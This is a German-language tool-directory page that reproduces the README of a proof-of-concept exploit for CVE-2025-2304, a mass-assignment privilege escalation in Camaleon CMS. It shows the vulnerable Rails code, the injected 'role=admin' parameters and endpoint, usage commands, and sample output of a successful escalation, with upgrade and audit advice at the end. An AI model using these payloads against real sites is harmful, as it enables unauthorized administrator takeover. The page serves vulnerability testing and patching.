Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2304-POC — Proof-of-concept für CVE-2025-2304 — kritische Mass-Assignment-Privilegienerweiterung (CVSS 9.4) in Camaleon CMS. | Kitploit
Tools/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Proof-of-concept für CVE-2025-2304 — kritische Mass-Assignment-Privilegienerweiterung (CVSS 9.4) in Camaleon CMS.

Repository anzeigen
1034vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-2304 PoC – Privilegieneskalation in Camaleon CMS

CVE CVSS Python License

Ein Proof-of-Concept-Exploit (PoC) für CVE-2025-2304, eine kritische Mass-Assignment-Schwachstelle in Camaleon CMS, die eine Privilegieneskalation von Benutzern mit niedrigen Berechtigungen zu Administratoren ermöglicht.

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Inhaltsverzeichnis

  • Übersicht
  • Details zur Schwachstelle
  • Funktionen
  • Installation
  • Verwendung
  • Beispiele
  • Betroffene Versionen
  • Gegenmaßnahmen
  • Haftungsausschluss
  • Referenzen
  • Autor

🔍 Übersicht

CVE-2025-2304 ist eine kritische Mass-Assignment-Schwachstelle in Camaleon CMS, die in der Methode updated_ajax des UsersController existiert. Die Schwachstelle beruht auf der Verwendung der gefährlichen Methode permit! in Rails, die alle Parameter ohne jegliche Filterung durchlässt.

Dieser PoC zeigt, wie ein authentifizierter Benutzer mit niedrigen Berechtigungen durch das Injizieren unautorisierter Parameter während Passwortänderungsvorgängen zur Administratorrolle eskalieren kann.

CVSS-Score: 9.4 (Kritisch)

🐛 Details zur Schwachstelle

Ursache

Der anfällige Code verwendet params.require(:user).permit!, das alle benutzerdefinierten Parameter ohne Validierung akzeptiert:

def updated_ajax
  user_params = params.require(:user).permit!  # DANGEROUS!
  current_user.update(user_params)
end

Ausnutzung

Ein Angreifer kann zusätzliche Parameter wie user[role]=admin neben legitimen Passwortänderungsfeldern injizieren, wodurch die Anwendung die Rolle des Benutzers auf Administrator aktualisiert.

Angriffsvektor:

  1. Sich als Benutzer mit niedrigen Berechtigungen authentifizieren (z. B. Rolle „client“)
  2. Eine manipulierte POST-Anfrage an /admin/users/{id}/updated_ajax senden
  3. Den Parameter user[role]=admin injizieren
  4. Die Benutzerrolle eskaliert zum Administrator

✨ Funktionen

  • ✅ Sicheres Testen: Das Benutzerpasswort bleibt während der Ausnutzung erhalten
  • ✅ Mehrere Payloads: Testet 7+ verschiedene Injektionstechniken
  • ✅ Versionserkennung: Erkennt automatisch anfällige CMS-Versionen
  • ✅ Nicht-destruktive Option: --no-password-field-Flag für sicherstes Testen
  • ✅ Proxy-Unterstützung: Integration mit Burp Suite/ZAP für manuelle Analyse
  • ✅ Ausführlicher Modus: Detaillierte Ausgabe zum Debuggen
  • ✅ Admin-Übernahme: Optionaler Angriff auf das Zurücksetzen des Admin-Passworts
  • ✅ Farbcodierte Ausgabe: Klare visuelle Indikatoren für Erfolg/Fehlschlag

📦 Installation

Voraussetzungen

  • Python 3.7+
  • pip (Python-Paketmanager)

Repository klonen

git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Abhängigkeiten installieren

pip install -r requirements.txt

Oder manuell installieren:

pip install requests beautifulsoup4

🚀 Verwendung

Grundlegende Syntax

python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Befehlszeilenoptionen

positional arguments:
  target                Target URL (e.g., http://target.com)

required arguments:
  -u, --username        Existing username for authentication
  -p, --password        User password

optional arguments:
  -h, --help            Show help message and exit
  -v, --verbose         Verbose output (show all requests)
  --proxy PROXY         HTTP proxy for traffic inspection (e.g., http://127.0.0.1:8080)
  --no-password-field   Test exploitation without password fields (safest)
  --skip-admin-test     Skip destructive admin password reset test

📚 Beispiele

Standardtest (empfohlen)

Mit vorhandenen Benutzeranmeldedaten testen, während das Passwort erhalten bleibt:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Sicherster Test (ohne Passwortfelder)

Testen ohne Passwortfelder im Exploit-Payload:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Mit Burp-Suite-Proxy

Verkehr für die manuelle Analyse durch Burp Suite leiten:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Ausführlicher Modus

Detaillierte Ausgabe aktivieren, die alle Anfragen und Antworten zeigt:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Destruktive Tests überspringen

Nur die Privilegieneskalation testen, das Zurücksetzen des Admin-Passworts überspringen:

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Beispielausgabe

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Target: http://target.com
[*] Username: testuser
[*] Password: **********

[*] Logging in as testuser...
[+] Successfully logged in

[*] Checking CMS version...
[*] Detected version: 2.9.0
[+] Version is VULNERABLE (< 2.9.1)

============================================================
[*] Testing CVE-2025-2304 Mass Assignment Vulnerability
============================================================

[*] Target User: testuser (ID: 7)
[*] Current Role: Client (client)
[*] Password will remain unchanged

[1/7] Testing: AJAX endpoint - user[role]
    ✗ Failed
[2/7] Testing: AJAX endpoint - password[role]
============================================================
[+] EXPLOITATION SUCCESSFUL!
============================================================
[+] Privilege Escalation: Client → Administrator
[+] Vulnerable Endpoint: /admin/users/7/updated_ajax
[+] Working Payload: {'password[role]': 'admin'}
[+] Password Unchanged: User can still login normally
[+] CVE-2025-2304 CONFIRMED!

[✓] CVE-2025-2304 VULNERABILITY CONFIRMED

🎯 Betroffene Versionen

VersionStatus
< 2.9.1❌ Anfällig
≥ 2.9.1✅ Behoben

Besonders anfällig:

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x und früher

🛡️ Gegenmaßnahmen

Sofortmaßnahmen

  1. Upgrade auf Version 2.9.1 oder neuer

    gem update camaleon_cms
    
  2. Benutzerkonten prüfen

    • Auf unerwartete Berechtigungsänderungen prüfen
    • Protokolle zu Änderungen der Benutzerrollen überprüfen
    • Nach verdächtigen POST-Anfragen an /users/*/updated_ajax suchen
Tool herunterladen